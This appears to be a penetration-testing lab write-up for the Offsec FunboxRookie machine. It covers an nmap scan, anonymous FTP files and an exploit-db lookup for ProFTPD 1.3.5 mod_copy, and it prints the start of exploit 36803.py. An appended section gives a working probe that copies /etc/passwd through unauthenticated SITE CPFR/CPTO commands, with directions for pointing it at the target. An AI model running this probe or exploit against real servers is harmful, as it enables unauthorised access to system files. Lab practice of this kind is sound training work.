Offsec - FunboxRookie - May 13th 2023
Target is: [LAB_IP]
nmap --top-ports 100 -sV [LAB_IP] -sC
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-13 04:19 EDT
Nmap scan report for [LAB_IP]
Host is up (0.046s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 [HASH_REDACTED] (RSA)
| 256 [HASH_REDACTED] (ECDSA)
|_ 256 [HASH_REDACTED] (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
Check out the FTP files and also the disallowed entry. Will try PentestGPT's suggestions as well. (Configured PentestGPT locally really quick.)
PentestGPT consultation
python3 main.py --reasoning_model=gpt-4 --useAPI
target is [LAB_IP]. Goal is to get root access. No auto exploit frameworks
What next? Also don't suggest auto exploit frameworks.
And it broke lol
Anyhow looking first at FTP anon I'll check out what's there
Dumped the FTP contents and the welcome message says it's an experimental FTP server.
Attempting to unzip the files prompts for an id_rsa password.
Will go back to this for cracking...
Checking for a service version vuln
Found an exploit for the ProFTPD version:
→ searchsploit ProFTPD 1.3.5
Exploit Title                                              | Path
---------------------------------------------------------- | ---------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution        | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)    | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                  | linux/remote/36742.txt
---------------------------------------------------------- | ---------------------
Shellcodes: No Results
Papers: No Results
cat /usr/share/exploitdb/exploits/linux/remote/36803.py
Title: ProFTPd 1.3.5 Remote Command Execution
Date : 20/04/2015
Author: R-73eN
Software: ProFTPd 1.3.5 with mod_copy
Tested : Kali Linux 1.06
CVE : 2015-3306
Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ | __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ | |_ / _ | | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | | () | || | / | | | / ___ | | \n"
banner +=" |_|| |_|| _/ _|___|| || // ______|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
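Added example, not part of the write-up and not the Exploit-DB script above: the control-channel exchange that CVE-2015-3306 depends on is a SITE CPFR followed by a SITE CPTO being honoured before any USER/PASS. The probe below sends exactly that pair and reports whether the server accepted it, which is the precondition 36803.py builds on. So it runs offline, it talks to a constructed in-process stand-in for a ProFTPD control port rather than the lab host; the stand-in, its reply strings, the ephemeral port and the /etc/passwd to /tmp paths are illustration assumptions, though the 350 and 250 replies mirror what mod_copy returns on a successful copy. Setting patched=True on the stand-in models a server that insists on login first, so the same probe shows both outcomes.

```python
import socket
import threading

# Constructed banner for the stand-in server; not a real host.
BANNER = "220 ProFTPD 1.3.5e Server (constructed stand-in) [127.0.0.1]"


def _read_line(sock):
    """Read one CRLF-terminated FTP control line from a blocking socket."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
    return buf.decode("latin-1").strip()


def _send_line(sock, line):
    sock.sendall((line + "\r\n").encode("latin-1"))


def start_fake_proftpd(patched):
    """Minimal constructed stand-in for a ProFTPD control channel (assumption:
    this is NOT ProFTPD, only enough of the dialogue to exercise the probe).
    patched=False reproduces the CVE-2015-3306 condition: SITE CPFR / SITE CPTO
    are acted on with no prior USER/PASS. patched=True answers 530 until login.
    Returns (port, list_of_commands_seen)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # ephemeral port, assumption for the demo
    srv.listen(1)
    seen = []

    def serve():
        conn, _ = srv.accept()
        with conn:
            _send_line(conn, BANNER)
            while True:
                line = _read_line(conn)
                if not line:
                    break
                seen.append(line)
                upper = line.upper()
                if upper == "QUIT":
                    _send_line(conn, "221 Goodbye.")
                    break
                if upper.startswith("SITE") and patched:
                    _send_line(conn, "530 Please login with USER and PASS")
                elif upper.startswith("SITE CPFR"):
                    # mod_copy's reply when the source path was accepted
                    _send_line(conn, "350 File or directory exists, ready for destination name")
                elif upper.startswith("SITE CPTO"):
                    # mod_copy's reply when the copy was performed
                    _send_line(conn, "250 Copy successful")
                else:
                    _send_line(conn, "500 Unknown command")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], seen


def mod_copy_probe(host, port, src, dst):
    """Send the unauthenticated SITE CPFR / SITE CPTO pair and return the
    three replies: banner, CPFR reply, CPTO reply."""
    replies = []
    with socket.create_connection((host, port), timeout=5) as s:
        replies.append(_read_line(s))            # 220 banner
        _send_line(s, f"SITE CPFR {src}")
        replies.append(_read_line(s))            # 350 if the source was accepted
        _send_line(s, f"SITE CPTO {dst}")
        replies.append(_read_line(s))            # 250 if the copy went through
        _send_line(s, "QUIT")
        _read_line(s)                            # 221
    return replies


def copy_allowed_unauthenticated(replies):
    """True when both mod_copy commands succeeded with no login at all."""
    return replies[1].startswith("350") and replies[2].startswith("250")


if __name__ == "__main__":
    # Run the probe against both flavours of the stand-in.
    for patched in (False, True):
        port, seen = start_fake_proftpd(patched)
        replies = mod_copy_probe("127.0.0.1", port, "/etc/passwd", "/tmp/passwd.copy")
        label = "requires login" if patched else "copies without login"
        print(f"{label}: {replies[1]!r} / {replies[2]!r}; server saw {seen}")
```

To use it against the real target, call mod_copy_probe("[LAB_IP]", 21, ...) instead of the stand-in; a 350/250 pair confirms the precondition before running 36803.py, while a 530 on the first SITE command means mod_copy is gated behind authentication and the script will not get anywhere.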